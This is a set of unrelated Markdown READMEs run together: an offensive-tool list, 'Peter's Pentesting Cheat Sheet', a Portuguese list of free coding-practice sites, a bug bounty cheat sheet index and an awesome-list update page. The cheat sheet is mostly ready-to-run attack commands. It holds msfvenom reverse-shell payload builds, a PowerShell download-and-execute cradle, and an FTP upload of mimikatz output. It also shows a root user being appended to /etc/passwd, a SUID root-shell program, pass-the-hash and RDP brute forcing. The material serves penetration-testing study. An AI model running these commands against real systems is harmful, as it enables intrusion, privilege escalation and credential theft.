* [SharPyShell](https://github.com/antonioCoco/SharPyShell) - Tiny and obfuscated ASP.NET webshell for C# web applications.
* [weevely3](https://github.com/epinna/weevely3) - Weaponized PHP-based web shell.
### Web-accessible source code ripping tools
* [DVCS Ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG/BZR.
* [GitTools](https://github.com/internetwache/GitTools) - Automatically find and download Web-accessible `.git` repositories.
* [git-dumper](https://github.com/arthaud/git-dumper) - Tool to dump a git repository from a website.
* [git-scanner](https://github.com/HightechSec/git-scanner) - Tool for bug hunting or pentesting websites that have open `.git` repositories available in public.
### Web Exploitation Books
* [The Browser Hacker's Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
* [The Web Application Hacker's Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
## Windows Utilities
* [Bloodhound](https://github.com/adaptivethreat/Bloodhound/wiki) - Graphical Active Directory trust relationship explorer.
* [Commando VM](https://github.com/fireeye/commando-vm) - Automated installation of over 140 Windows software packages for penetration testing and red teaming.
* [Covenant](https://github.com/cobbr/Covenant) - ASP.NET Core application that serves as a collaborative command and control platform for red teamers.
* [ctftool](https://github.com/taviso/ctftool) - Interactive Collaborative Translation Framework (CTF) exploration tool capable of launching cross-session edit session attacks.
* [DeathStar](https://github.com/byt3bl33d3r/DeathStar) - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
* [Empire](https://www.powershellempire.com/) - Pure PowerShell post-exploitation agent.
* [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel.
* [Inveigh](https://github.com/Kevin-Robertson/Inveigh) - Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/machine-in-the-middle tool.
* [LaZagne](https://github.com/AlessandroZ/LaZagne) - Credentials recovery project.
* [MailSniper](https://github.com/dafthack/MailSniper) - Modular tool for searching through email in a Microsoft Exchange environment, gathering the Global Address List from Outlook Web Access (OWA) and Exchange Web Services (EWS), and more.
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) - PowerShell Post-Exploitation Framework.
* [RID_ENUM](https://github.com/trustedsec/ridenum) - Python script that can enumerate all users from a Windows Domain Controller and crack those user's passwords using brute-force.
* [Responder](https://github.com/SpiderLabs/Responder) - Link-Local Multicast Name Resolution (LLMNR), NBT-NS, and mDNS poisoner.
* [Rubeus](https://github.com/GhostPack/Rubeus) - Toolset for raw Kerberos interaction and abuses.
* [Ruler](https://github.com/sensepost/ruler) - Abuses client-side Outlook features to gain a remote shell on a Microsoft Exchange server.
* [SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt) - Retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases.
* [Sysinternals Suite](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) - The Sysinternals Troubleshooting Utilities.
* [Windows Credentials Editor](https://www.ampliasecurity.com/research/windows-credentials-editor/) - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
* [Windows Exploit Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - Detects potential missing patches on the target.
* [mimikatz](http://blog.gentilkiwi.com/mimikatz) - Credentials extraction tool for Windows operating system.
* [redsnarf](https://github.com/nccgroup/redsnarf) - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
* [wePWNise](https://labs.mwrinfosecurity.com/tools/wepwnise/) - Generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software.
* [WinPwn](https://github.com/SecureThisShit/WinPwn) - Internal penetration test script to perform local and domain reconnaissance, privilege escalation and exploitation.
## License
[![CC-BY](https://mirrors.creativecommons.org/presskit/buttons/88x31/svg/by.svg)](https://creativecommons.org/licenses/by/4.0/)
This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).
|
# Peter's Pentesting Cheat Sheet
The tools used here are available in Kali Linux.
## nmap
TCP network scan, top 100 ports
```
nmap -nv -sT --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24
```
TCP network scan, top 100 ports with OS discovery
```
nmap -nv -sTV -O --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24
```
TCP host scan, all ports with OS discovery
```
nmap -Pn -sT -O -p- -oA nmap-tcp-all 192.168.0.20
```
## NETBIOS
NBT name scan
```
nbtscan 192.168.0.20
nbtscan 192.168.0.0/24
```
## SNMP
SNMP scan
```
nmap –sU –p161,162 10.11.1.0/24 -oA nmap-snmp-scan
onesixtyone 192.168.0.20
onesixtyone -i snmp-hosts.txt -c /usr/share/doc/onesixtyone/dict.txt
snmpenum 192.168.0.20 public windows.txt
```
## FTP
Check anonymous access
```
nmap -p21 --script=ftp-anon 192.168.0.20
```
Start a local FTP server on port 21 with anonymous access to files in the current directory
```
sudo apt install python3-pyftpdlib
sudo python3 -m pyftpdlib -w -p 21
```
FTP script for the Windows command line to download further tools
```
echo open 192.168.0.20 > ftpscript.txt
echo USER anonymous >> ftpscript.txt
echo anonymous >> ftpscript.txt
echo binary >> ftpscript.txt
echo get PsExec.exe >> ftpscript.txt
echo bye >> ftpscript.txt
ftp -v -n -s:ftpscript.txt
```
FTP script to upload data to your host
```
echo open 192.168.0.20 > ftpscript.txt
echo USER anonymous >> ftpscript.txt
echo anonymous >> ftpscript.txt
echo put mimikatz.log >> ftpscript.txt
echo bye >> ftpscript.txt
ftp -v -n -s:ftpscript.txt
```
## HTTP(S)
Nikto scan
```
nikto -host 192.168.0.20
nikto -ssl -host 192.168.0.20:443
```
Directories scan
```
dirb http://192.168.0.20/ /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://192.168.0.20/ -w /usr/share/wordlists/dirb/big.txt
```
Start a HTTP server on port 80, serving files from the current directory
```
sudo python -m SimpleHTTPServer 80
```
## SMB
Scan for some known vulnerabilities
```
nmap -p139,445 --script smb-vuln-* 192.168.0.20
```
List available shares without providing any user credentials
```
smbclient -L //192.168.0.20 -N
```
List shares which are available for user Peter
```
smbclient -L //192.168.0.20 -U 'Peter'
```
Connect to share wwwroot
```
smbclient //192.168.0.20/wwwroot -N
smbclient //192.168.0.20/wwwroot -U 'Peter'
```
## MSSQL
Database info
```
nmap -nv -Pn -p27900 --script=ms-sql-info --script-args mssql.username=user,mssql.password=password,mssql.instance-name=mydb 192.168.0.20
```
Connect to the DB
```
sqsh -S 192.168.0.20 -U username -P password
mssqlclient.py user:password@192.168.0.20 -db mydb -port 27900
```
## RDP
Connect to a host using xfreerdp
```
xfreerdp /u:mydomain\\peter /p:password /v:192.168.0.20
```
Share a local folder with the remote host
```
rdesktop -u peter -p password -r disk:shared=/home/kali/shared 192.168.0.20
```
Pass the hash using xfreerdp
```
xfreerdp /u:domain\\user /pth:HASH /v:192.168.0.20
```
Bruteforce RDP credentials
```
crowbar -b rdp -s 192.168.0.20/32 -U usernames_file -C passwords_file
```
## VNC
Check for RealVNC 4.1.0 - 4.1.1 Authentication Bypass
```
# nmap -p5800,5900 --script realvnc-auth-bypass 192.168.0.20
```
## Metasploit
Creating WAR file exploit with reverse shell
```
msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war
```
Creating ASP file exploit with reverse shell
```
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f asp > reverse.asp
```
Generating JavaScript code to open a reverse shell
```
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f js_le
```
## WordPress
Scan for known vulnerabilities
```
wpscan --url http://192.168.0.20/wp/
```
Crack retrieved password hashes
```
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
```
## Windows Enumeration
Basic information about Windows
```
systeminfo
```
List network adapters and IP addresses
```
ipconfig /all
```
List open ports and active service connections
```
netstat -ano
```
User information, groups, privileges
```
whoami
whoami /groups
whoami /priv
net user
net user /domain
net user peter
net localgroup
```
Show ACL information for a folder
```
icacls "C:\Program Files"
```
List services, their paths, start mode and privileges
```
wmic service get name,displayname,pathname,startmode,startname
wmic service get name,displayname,pathname,startmode,startname | findstr /i "auto" | findstr /i /v "C:\Windows"
```
List installed software, vendors and version numbers
```
wmic product get name,version,vendor
```
List drivers installed on the system
```
driverquery /v
```
## Windows Privilege Escallation
Add a new user
```
net user peter password /add
```
Add user to a group
```
net localgroup Administrators /add peter
net localgroup "Remote Desktop Users" /add peter
```
From Administrator shell to nt authority\system
```
PsExec.exe -i -s cmd.exe
```
Download PowerShell script and execute it without having to store the script on the host
```
powershell -c "iex (New-Object Net.WebClient).DownloadString('http://192.168.0.1/Invoke-Kerberoast.ps1'); Invoke-Kerberoast"
```
## Linux Enumeration
Upgrading a dumb reverse shell to an interactive TTY
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
## Linux Privilege Escallation
If /etc/passwd is writable, add a new user with root privileges
```
openssl passwd -1 password
$1$7RaNk8Qt$vIvEmA/ylE5Rg7t1sDvrG0
openssl passwd -6 -salt peter password
$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.
echo 'peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash' >> /etc/passwd
```
Sample C program to add a new user. Useful if it is possible to run a program from the root context.
```
#include <stdio.h>
FILE *pfile;
int main(void) {
pfile = fopen("/etc/passwd", "a");
fprintf(pfile, "%s", "peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash\n");
return 0;
}
```
Sample SUID program to execute a root shell
```
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void) {
setuid(0);
setgid(0);
system("/bin/bash");
}
```
Set the SUID bit and ownership for an executable
```
chown root:root /tmp/program
chmod u+s /tmp/program
```
## Port Forwarding / Tunneling
Remote port forwarding in Linux with SSH
```
ssh -oStrictHostKeyChecking=no -f -N -p 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -i id_rsa
```
Remote port forwarding in Windows with plink.exe
```
plink.exe -v -ssh -P 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -pw kali
```
Dynamic port forwarding in Linux with SSH
```
ssh -D 1080 kali@192.168.0.10
```
## Tools
A simple wget alternative in python to download files when wget is not available
```
import urllib2
import sys
response = urllib2.urlopen(sys.argv[1])
data = response.read()
filename = sys.argv[1].split("/")[-1]
target_file = open(filename, "w")
target_file.write(data)
target_file.close()
```
|
# Sumário
- [Sobre esse repositório](#sobre-esse-repositório)
- [Sites com exercícios](#sites-com-exercícios)
- [IDE's online](#ides-online)
- [Outras Ferramentas](#outras-ferramentas)
- [Extras](#extras)
- [API](#api)
# Sobre esse repositório
- Esse repositório foi criado por mim [Fernanda Souza](https://github.com/leitoraincomum) com o intuito de divulgar ferramentas gratuitas que possam auxiliar pessoas em seus estudos.
- Se conhece alguma que não está listada, faça fork desse repositório e abra uma solicitação de alteração (pull request).
# Sites com exercícios
- *Sites com exercícios para treinar*
|Nome com Link | Sistema de Pontuação? | Salva Projetos? | Linguagens Suportadas | Observações |
| ---------------- | ---------------- |---------- |----------- | -------- |
|[beecrowd](https://www.beecrowd.com.br/) | SIM | Não | C, C++, C#, Clojure, Dart, Go, Haskell, Java, JavaScript, Kotlin, PHP, Python, R, Ruby, Rust e Scala | 6 Modos desde o iniciante, com Hello World! |
|[Bento.IO](https://bento.io)| Sim | Não | Nenhuma específica | Plataforma de auxilio a se tornar autodidata em programação (em inglês)|
|[C4n y0u H4ck 1t](https://hack.ainfosec.com/) | Sim | Não | |Site com desafios de segurança, simples e avançados (Os pontos podem ser usados para se candidatar a empresa) |
|[Can You Hack Us?](https://canyouhack.us/) | Sim | Não | |Site com desafios de segurança (desde a pagina inicial)|
|[Code](https://code.org)| Não | Sim | Não disponível | Cursos de treino de lógica, entre outros para pessoas iniciantes |
|[Code Academy](https://www.codecademy.com/)| Não | Não Sei| Diversas áreas de conhecimento| -------------|
|[Code Chef](https://www.codechef.com/ide)| Sim | Sim | As principais de competições de programação| Site para treinamento em competições de programação |
|[Code Wars](https://www.codewars.com/)| Sim | Sim | CoffeScript, Coq, Go, NASM, Scala, Shell, entre outras.| Plataforma com exercícios para estudo de diversas linguagens (em inglês) |
|[Codepip](https://codepip.com/) | Sim | Não | HTML, CSS e JavaScript| Série de jogos e exercícios práticos para praticar a stack básica de frontend |
|[Coder Byte](https://www.coderbyte.com/)| ------ | ------ | C, C++, C#, Clojure, Dart, Elixir, Go, Java, JavaScript, Kotlin, PHP, Python3, R, Ruby, Scala, Swift, TypeScript | O Coderbyte oferece mais de 200 desafios de programação e os desafios vão de fáceis a difíceis. ||[Coding Game](https://www.codingame.com/start) | Não sei | Sim | Bash, C, C++, C#, Clojure, D, Dart, F#, Go, Groovy, Haskell, Java, JavaScript, Kotlin, Lua, Objective-C, OCaml, Pascal, PHP, Python, Ruby, Rust, Scala, Swift, TypeScript e VB.NET | --------- |
|[Coding Game](https://www.codingame.com/)| Sim | Sim | Bash, C, C#, C++, Clojure, D, Dart, F#, Go, Groovy, Haskell, Java, Javascript, Kotlin, Lua, ObjectiveC, OCaml, Pascal, Perl, PHP, Python3, Ruby, Rust, Scala, Swift, TypeScript, VB.NET| Site para competir e aprender criando algoritmos para jogar|
|[Coursera](https://www.coursera.org/)| Não | Não | Diversas | Plataforma de cursos gratuitos com certificado |
|[CSS Battle](https://cssbattle.dev/) | Sim | Sim | HTML, CSS | Site de competição de css com menor numero de caracteres |
|[CSS Diner](https://flukeout.github.io/)| Não | Não | CSS | Desafios para treinar seletores CSS |
|[Exercism](https://exercism.org/)| Sim | Sim | Diversas (55 linguagens) | Plataforma 100% free, para aprender e praticar |
|[Flex Box](https://flexboxfroggy.com)| Não | Não | Flex Box (CSS) | Desafios para treinar FLex Box |
|[Flexbox Zombies](https://mastery.games/flexboxzombies/)| Sim | Sim | CSS | Jogo gratuito para exercitar CSS de forma mais dinâmica e divertida |
|[Free Code Camp](https://www.freecodecamp.org)| Não | Não | Diversas | Plataforma de certificação de habilidades técnicas gratuita (em inglês) |
|[Fullstack Café](https://www.fullstack.cafe/)| Não | Não | Diversas | Plataforma para treinar perguntas técnicas e desafios de código (em inglês) |
|[Grid Garden](https://cssgridgarden.com/) | Não | Não | CSS | Site para aprender e treinar css grid layout |
|[Hack the box](https://www.hackthebox.com/)| Sim | Sim | |Site com desafios de segurança|
|[Hackr.IO](https://hackr.io) | Não | Não | Diversas | Agregador de cursos online, gratuitos e pagos |
|[Hacker Rank](https://www.hackerrank.com)| SIM | Não | Angular, C#, CSS, Go, Java, JavaScript, Node, Node.js, Python, R, React, Rest API, SQL e etc. | Modos básicos e intermediários |
|[Kaggle](https://www.kaggle.com/) | SIM | Não | Python, R, SQL | Maior site de referência para aprendizado de Data Science, Machine Learn e afins |
|[Kattis](https://open.kattis.com/)| Sim | Sim | C, C#, C++, COBOL, F#, Go, Haskell, Java, Node.js, SpiderMonkey(JS), Kotlin, Common Lisp, Objective-C, OCaml, Pascal, PHP, Prolog, Python 2, Python 3, Ruby, Rust | Site com desafios de algoritimo para treinar, com rank de países e universidades |
|[Khan Academy](https://pt.khanacademy.org) | Sim | Não | Lógica e outras disciplinas | --------- |
|[Koans Kotling](https://play.kotlinlang.org/koans/Introduction/Hello,%20world!/Task.kt)| Não | Não | Kotlin | Teste de estruturas Kotlin para aprendizado |
|[Kotlinautas - Exercícios Kotlin](https://github.com/Kotlinautas/curso-kotlinautas)| Não | Não | Kotlin | Projeto com exercícios de Kotlin em pt-br que pode ser utilizado dentro da IDE Intellij Community com o plugin EduTools |
|[LeetCode](https://leetcode.com/) | SIM | Não | C, C++, C#, Go, Java, JavaScript, Kotlin, PHP, Python, Python3, R, Ruby, Rust, MySQL, MS SQL, Oracle, Bash, Swift, Rust, Typescript, Racket, Erlang e Elixir | Site muito bom para treinar programação e estudar pra entrevista de código, tem módulos básicos, intermediários e avançados. Sessão com materiais de estudos com prática e contest toda semana. |
|[PicoCTF](https://picoctf.org/)| Sim | Não | ------ | Site com desafios de segurança(em inglês)|
|[SoloLearn](https://www.sololearn.com/)| Sim | Não | Diversas | Diversos cursos gratuitos de programação com certificado. (em inglês)|
|[SQL Murder mistery](https://mystery.knightlab.com/walkthrough.html) | Não | Não | SQL | Site com explicação/tutoriais interativos de sql que com os resultados ajudam a resolver um mistério |
|[Top Coder](https://www.topcoder.com)| Sim | ------ | Diversas, depende do desafio | Voltado para programação competitiva, onde se pode competir com os outros resolvendo desafios o mais rápido possível para ter as melhores pontuações.|
|[Try Hack me](https://tryhackme.com/) | Sim | Sim | |Site com desafios e tutorias de segurança |
# IDE's online
- *Caso queira estudar linguagens e não possa ou não queira instalar uma IDE, existem essas online*
|Nome com Link | Sistema de Pontuação? | Salva Projetos? | Linguagens Suportadas | Observações |
| ---------------- | ----------- | ---------------- | ----------- | -------- |
|[Code Sand Box](https://codesandbox.io)| Não | Sim | HTML, CSS, Node.js, [entre outras](https://codesandbox.io/docs/start) | Plataforma para projetos front-end |
|[DartPad](https://dartpad.dev/) | Não | Não | Dart | --------- |
|[Glitch](https://glitch.com/) | Não | Sim | Linguagens para aplicações web | IDE e comunidade para aplicações web |
|[IDEONE](https://ideone.com)| Não | Sim | Ada95, Assembler, AWK, Bash, C99, Cobol, COBOL 85, Fortran, Go, SQLite, Swift, [entre outras](https://ideone.com/credits)| ------ |
|[Learn Git](https://learngitbranching.js.org/?locale=pt_BR)| Não | Não | Git | Aqui você pode aprender no passo a passo ou treinar no modo sandbox! |
|[OnLineGDB](https://www.onlinegdb.com) | Não | Sim | C, C++, Python, PHP, Ruby, C#, VB, Perl, Swift, Prolog, Javascript, Pascal, HTML, CSS e JavaScript | -------- |
|[Online IDE](https://www.online-ide.com)| Não | Não | Bash, C, C++, Go Lang, Java, PHP, Python, R e Ruby | Não tem sistema de login para usar |
|[ReplIt](https://repl.it/)| Não | Sim | Bloop, Deno, Julia, Lua, Nim, Raku, Roy, [entre outras](https://replit.com/site/about) | -------- |
|[vscode(beta)](https://vscode.dev/)| Não | Localmente | C/C++, C#, Java, PHP, Rust, Go, TypeScript, JavaScript, Python, JSON, HTML, CSS, and LESS, [entre outras](https://code.visualstudio.com/blogs/2021/10/20/vscode-dev)|
|[CodePen](https://codepen.io/)| Sim | Sim | HTML, CSS, JavaScript | Editor de códigos front end. Suporta importação de scripts, fontes e CSS externos. Feedback imediato das atualizações feitas. Ótimo para treinar CSS :)
|[Fronteditor](https://www.fronteditor.dev/)| Não | Sim | HTML, CSS, JavaScript, Markdown | Um simples editor de texto para projetos HTML/CSS/JavaScript.)
|[Programiz](https://www.programiz.com/python-programming/online-compiler/)| Não | Não | Python, C, C++, C#, Java, JS, SQL, HTML/CSS | Não tem sistema de login para usar |
# Outras Ferramentas
- *Outras ferramentas de aprendizado gratuitas*
|Nome com Link | Sistema de Pontuação? | Linguagens Suportadas | Descrição |
| ---------------- | --------------------------- | ----------- | -------- |
|[APP Inventor](http://ai2.appinventor.mit.edu/) | Não | Indefinida | Site para construção de aplicações mobile para iniciantes usando métodos de blocos para programação |
|[Cron App](https://www.cronapp.io/) | Não | Diversas | Plataforma de desenvolvimento de projetos de aplicações web em nuvem |
|[Read Me](https://readme.so/editor)| Não | Read Me | Site para criação de ReadMe para seus projetos |
|[Free for Dev](https://free-for.dev/)| Não | Diversas | Site com serviços, ferramentas e recursos gratuitos para devs (hospedagem, cloud, monitoramento, testes, etc)
|[Carbon](https://carbon.vercel.app/)| Não | Diversas | Site para criar e compartilhar bonitas imagens do seu codigo
|[Thunkable](https://thunkable.com/#//)| Não | No-code | Plataforma para aprendizado e prototipação de aplicativos mobile.
# Extras
- *Cursos, vídeo aulas, etc. gratuitos*
|Nome com Link | Tipo de Conteúdo | Feito por: |
| ------ | -------- | -------- |
| [4Noobs](https://github.com/he4rt/4noobs) | Tutorais e guias de diversos tópicos com nível iniciante em TI | Comunidade He4rt |
|[Blog Kotlin](https://blog.kotlin-academy.com/best-kotlin-free-online-courses-5838cb7063c6) | Página do blog oficial da linguagem Kotlin com cursos gratuitos com a missão de simplificar o aprendizado do Kotlin | Mantenedores da Linguagem |
|[Curso em Video](https://www.cursoemvideo.com/course/)| Portal de ensino com diversos cursos como Linux, Redes, Python, Java, PHP, Javascript, HTML, CSS, entre muitos outros| Gustavo Guanabara |
|[Descomplicando o Docker](https://www.youtube.com/watch?v=0cDj7citEjE&list=PLf-O3X2-mxDk1MnJsejJwqcrDC5kDtXEb)| Série de vídeo aulas | Jeferson Fernando ([LinuxTips](https://www.linuxtips.io)) |
|[Descomplicando Kubernets](https://www.youtube.com/playlist?list=PLf-O3X2-mxDmXQU-mJVgeaSL7Rtejvv0S)| Série de vídeo aulas | Jeferson Fernando ([LinuxTips](https://www.linuxtips.io)) |
|[DEV CHALLENGE](https://www.devchallenge.com.br/challenges)| Desafios de front-end, back-end e mobile | [Lorena Montes](https://www.linkedin.com/in/lorenagmontes/) |
|[Diego Mariano](https://diegomariano.com/home/#free-courses)| Portal de cursos que contém cursos gratuitos com certificado em tópicos como HTML, CSS, Linux, SQL, PHP, entre outros| Diego Mariano|
|[Introdução Js](http://betrybe.com/curso-gratuito-js)| Curso introdutório de JavaScript | Trybe |
|[loiane.training](https://loiane.training/cursos)| Cursos de Java, Angular, Phoneag e Apache Cordova, Fundamentos EXT JS 4 | [Loiane Groner](https://www.youtube.com/channel/UCqQn92noBhY9VKQy4xCHPsg)|
|[PHP do Jeito Certo](http://br.phptherightway.com)| Tutorial de PHP em texto | Josh Lockhart e [colaboradores](http://br.phptherightway.com/#site-footer)|
|[Poke PHP](https://pokephp.com.br)| Série de vídeo aulas | Rodrigo "PokemaoBR" Cardoso |
|[Kitten](https://kitten.code.game)| Plataforma lúdica de criação de games com foco em pessoas entre 3 e 18 anos | Codemao (Shenzhen Dianmao Technology Co., Ltd) |
|[Solyd](https://solyd.com.br/treinamentos/)| Introdução ao Hacking e Pentest e Python básico | Solyd|
|[WoMakersCode](https://maismulheres.tech/courses)| Cloud Computing, DevOps, Data Science, Inteligência artifical e muito mais| Microsoft|
|[Learn Ayything](https://learn-anything.xyz)| Trilhas com cursos, vídeos, artigos e repositórios do GitHub sobre qualquer assunto | Nikita Voloboev e Angelo Gazzola |
|[Microsoft Learn](https://docs.microsoft.com/pt-br/learn/)| Trilhas com tutoriais escritas sobre diversas tecnologias e ferramentas | Microsoft |
|[App Ideas](https://github.com/florinpop17/app-ideas)| Repositório com desafios de programação desde o iniciante até projetos avançados | Florin Pop |
|[Vue3 do Iniciante ao Avançado](https://igorhalfeld.teachable.com/p/treinamento-completo-e-gratuito-de-vue-js-3-do-iniciante-ao-avancado) | Curso completo de Vue3 | Igor Halfeld
|[AWS Training](https://www.aws.training/) | Treinamentos AWS com ferramentas e suporte para as certificações | AWS |
|[Assert+](https://www.assertplus.com.br/) | Conteúdo em geral sobre qualidade e testes de software | [Jhonatas Matos](https://github.com/jhonatasmatos) |
|[Série para iniciantes em JavaScript](https://www.youtube.com/playlist?list=PLb2HQ45KP0WsFop0pItGSUYl6baYjKEye) | Curso de Introdução ao JavaScript| [Glaucia Lemos](https://twitter.com/glaucia_lemos86) | JavaScript |
|[Build JavaScript applications using TypeScript](https://learn.microsoft.com/en-us/training/paths/build-javascript-applications-typescript/?WT.mc_id=javascript-23355-gllemos) | Curso de capacitação em TypeScript criado pela Microsoft e em PT-BR| Microsoft e [Glaucia Lemos](https://twitter.com/glaucia_lemos86) |
|[Curso Introdutório a Svelte](https://vercel.com/docs/beginner-sveltekit) | Curso de introdução ao framework frontend Svelte gratuito| [Vercel](https://vercel.com/) |
|[Cod3r Cursos](https://www.youtube.com/c/COD3RCURSOS) | Cursos de desenvolvimento web | [Cod3r](https://www.cod3r.com.br/) |
|[Curso de Flutter 2022](https://www.youtube.com/watch?v=Wdn6peqH9ZQ&list=PLlBnICoI-g-fuy5jZiCufhFip1BlBswI7)| Série de vídeo aulas | Flutterando |
|[Professor Isidro](https://www.professorisidro.com.br/courses/)| Cursos introdutórios de JAVA, Estrutura de Dados, Desenvolvimento Web e Compiladores | [Professor Isidro](https://www.instagram.com/professorisidro/) |
# API
- *Sites com concentração de API's para projetos*
|Nome com link | Descrição | Mantido por: |
| ------ | ----- | ------ |
|[RapiDapi](https://rapidapi.com/pt/marketplace)| Coleção de API's | RapidAPI |
|[BrasilAPI](https://brasilapi.com.br/docs) | Projeto de código aberto, que transforma o Brasil em uma API | Comunidade |
|[Public APIs](https://github.com/public-apis/public-apis)| Repositório com várias APIs gratuitas dos mais diversos assuntos|Public APIs|
|[Any API](https://any-api.com/)| Site com diversas apis abertas de diversos nichos | LucyBot Inc.|
|[ServeRest](https://serverest.dev/)| O ServeRest é uma API REST gratuita que simula uma loja virtual com intuito de servir de material de estudos de testes de API | [Paulo Gonçalves](https://github.com/PauloGoncalvesBH) |
|[Studio Ghibli API](https://ghibliapi.herokuapp.com/#section/Studio-Ghibli-API)| Site com filmes, personagens e outros personagens dos filmes do Studio Ghibli | Comunidade |
<!--
# Verificar
|Nome com link | ---- | --------- |
| ------ | ----- | ------ |
| | | | --------- |
--!>
|
# Bug Bounty Cheat Sheet
- [XSS](cheatsheets/xss.md)
- [SQLI](cheatsheets/sqli.md)
- [SSRF](cheatsheets/ssrf.md)
- [CRLF Injection || HTTP Response Splitting](cheatsheets/crlf.md)
- [CSV Injection](cheatsheets/csv-injection.md)
- [LFI](cheatsheets/lfi.md)
- [RCE](cheatsheets/rce.md)
- [Open Redirect](cheatsheets/open-redirect.md)
- [Crypto](cheatsheets/crypto.md)
- [Template Injection](cheatsheets/template-injection.md)
- [Content Injection](cheatsheets/content-injection.md)
# Contributing
We welcome contributions from the public.
### Using the issue tracker 💡
The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)
### Issues and labels 🏷
Our bug tracker utilizes several labels to help organize and identify issues.
### Guidelines for bug reports 🐛
Use the GitHub issue search — check if the issue has already been reported.
# Style Guide
We like to keep our Markdown files as uniform as possible. So if you submit a PR make sure to follow this style guide (We will not be angry if you do not.)
- Cheat sheet titles should start with `##`.
- Subheadings should be made bold. (`**Subheading**`)
- Add newlines after subheadings and code blocks.
- Code blocks should use three backticks. (```)
- Make sure to use syntax highlighting whenever possible.
# Contributors
- [EdOverflow](https://github.com/EdOverflow)
- [GerbenJavado](https://github.com/GerbenJavado)
- [jon_bottarini](https://github.com/BlueTower)
- [sp1d3r](https://github.com/sp1d3r)
|
# Awesome List Updates on May 11, 2018
9 awesome lists updated today.
[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung)
## [1. Awesome Machine Learning](/content/josephmisiti/awesome-machine-learning/README.md)
### JavaScript / General-Purpose Machine Learning
* [TensorFlow.js](https://js.tensorflow.org/) - A WebGL accelerated, browser based JavaScript library for training and deploying ML models.
## [2. Awesome Ember](/content/ember-community-russia/awesome-ember/README.md)
### Packages / Helpers
* [ember-root-url (⭐11)](https://github.com/ef4/ember-root-url) - A template helper to keep your URLs relative to the app's rootURL.
## [3. Awesome Css Learning](/content/micromata/awesome-css-learning/README.md)
### Animation / Grid
* [CSS 3D transforms](https://3dtransforms.desandro.com) - Multi page tutorial with examples like card flip and carousel effects.
* [CSS Animation for Beginners](https://robots.thoughtbot.com/css-animation-for-beginners) - Imparts the concepts of CSS animations with keyframes.
* [animatable](http://leaverou.github.io/animatable/) - Nice little page demonstrating which CSS properties are animatable.
## [4. Awesome](/content/Awesome-Windows/Awesome/README.md)
### Games
* [LuaStudio](http://scormpool.com/luastudio) - Free game development tool/engine. Create games and other graphic focused apps on Windows using Lua/LuaJIT programming language. Export them to many platforms including iOS, Android and Mac.
## [5. Awesome Elixir](/content/h4cc/awesome-elixir/README.md)
### Cloud Infrastructure and Management
* [Kazan (⭐136)](https://github.com/obmarg/kazan) - Kubernetes client for Elixir, generated from the k8s open API specifications.
### Date and Time
* [cocktail (⭐178)](https://github.com/peek-travel/cocktail) - Elixir date recurrence library based on iCalendar events.
### Examples and funny stuff
* [feedx (⭐11)](https://github.com/erneestoc/feedx) - Add social feed functionality to current applications. Exemplify OTP umbrella app, with 3 apps. Thin phoenix controllers.
### Framework Components
* [plug\_canonical\_host (⭐32)](https://github.com/remiprev/plug_canonical_host) - Plug to ensure all requests are served from a single canonical host.
### HTML
* [tidy\_ex (⭐9)](https://github.com/f34nk/tidy_ex) - Elixir binding to the granddaddy of HTML tools <http://www.html-tidy.org>.
### Queue
* [gen\_rmq (⭐178)](https://github.com/meltwater/gen_rmq) - Set of behaviours meant to be used to create RabbitMQ consumers and publishers.
### Security
* [pwned (⭐21)](https://github.com/thiamsantos/pwned) - Check if your password has been pwned.
### Testing
* [mockingbird (⭐3)](https://github.com/Driftrock/mockingbird) - A set of helpers to test code that involves http requests.
### Third Party APIs
